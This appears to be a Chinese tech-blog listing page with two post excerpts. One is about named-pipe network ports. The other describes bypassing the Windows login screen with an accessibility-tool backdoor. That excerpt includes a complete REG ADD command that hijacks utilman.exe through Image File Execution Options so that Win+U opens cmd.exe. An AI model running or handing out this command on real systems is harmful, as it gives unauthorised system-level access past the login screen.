winapi
cm20121009
干净的桌子千篇一律 乱的桌子却各有各的风骚
展开
-
winapi - Named pipes port number - Stack Overflow
Yes, when communicating with remote machines it uses ports 137 and 139 UDP and potentially 445 TCP. Locally pipes are implemented via MMF (memory mapped files). Essentially some of the facilities used...原创 2018-10-03 22:07:49 · 107 阅读 · 0 评论 -
利用辅助工具管理器后门(放大镜后门原理相同,进程为sethc.exe)绕过系统登录界面
调用辅助工具管理器的快捷键: Win+U通过注册表劫持实现后门,修改注册表的命令如下:REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe"...转载 2018-10-03 22:10:21 · 875 阅读 · 0 评论